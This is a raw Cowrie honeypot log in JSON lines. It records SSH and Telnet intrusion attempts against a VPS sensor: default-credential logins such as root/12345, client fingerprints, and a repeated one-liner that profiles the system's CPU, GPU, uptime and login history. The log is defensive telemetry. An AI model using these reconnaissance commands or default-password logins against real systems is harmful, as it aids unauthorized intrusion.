{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:14:23.458023Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:14:23.458729Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:14:23.459258Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:14:23.460138Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:14:23.461102Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:14:23.461888Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:14:23.462643Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:14:23.463699Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:14:23.464202Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:14:23.464684Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:14:23.465138Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:14:23.465746Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:14:23.466266Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:14:24.055518Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.6","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:14:24.056416Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:14:24.057499Z","src_ip":"212.227.125.160","session":"f4a5339d09d7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:14:28.122771Z","src_ip":"212.227.235.229","session":"9fdcbc9d4039"}
{"eventid":"cowrie.session.closed","duration":180.2836995124817,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:14:28.126784Z","src_ip":"212.227.235.229","session":"9fdcbc9d4039"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38692,"dst_ip":"1.2.3.4","dst_port":22,"session":"a9d56b62b625","protocol":"ssh","message":"New connection: 212.227.235.229:38692 (1.2.3.4:22) [session: a9d56b62b625]","sensor":"my-vps","timestamp":"2025-09-08T19:15:44.459705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:15:44.512363Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:15:44.758931Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.session.connect","src_ip":"87.121.84.168","src_port":34254,"dst_ip":"1.2.3.4","dst_port":23,"session":"899eeccb018c","protocol":"telnet","message":"New connection: 87.121.84.168:34254 (1.2.3.4:23) [session: 899eeccb018c]","sensor":"my-vps","timestamp":"2025-09-08T19:15:45.114868Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:15:45.159110Z","src_ip":"87.121.84.168","session":"899eeccb018c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:15:45.221135Z","src_ip":"87.121.84.168","session":"899eeccb018c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43758,"dst_ip":"1.2.3.4","dst_port":22,"session":"63dde5e27c88","protocol":"ssh","message":"New connection: 212.227.125.160:43758 (1.2.3.4:22) [session: 63dde5e27c88]","sensor":"my-vps","timestamp":"2025-09-08T19:15:45.820415Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:15:45.821178Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.057292Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.155411Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:15:46.674798Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.719736Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.720594Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.721740Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.723375Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.724041Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.724708Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.725736Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.726501Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.727186Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.727736Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.728436Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:15:46.729128Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:15:47.022005Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:15:47.022981Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:15:47.024075Z","src_ip":"212.227.235.229","session":"a9d56b62b625"}
{"eventid":"cowrie.login.success","username":"root","password":"12345","message":"login attempt [root/12345] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:15:47.283223Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:15:48.025373Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:15:48.026165Z","src_ip":"212.227.125.160","session":"63dde5e27c88"}
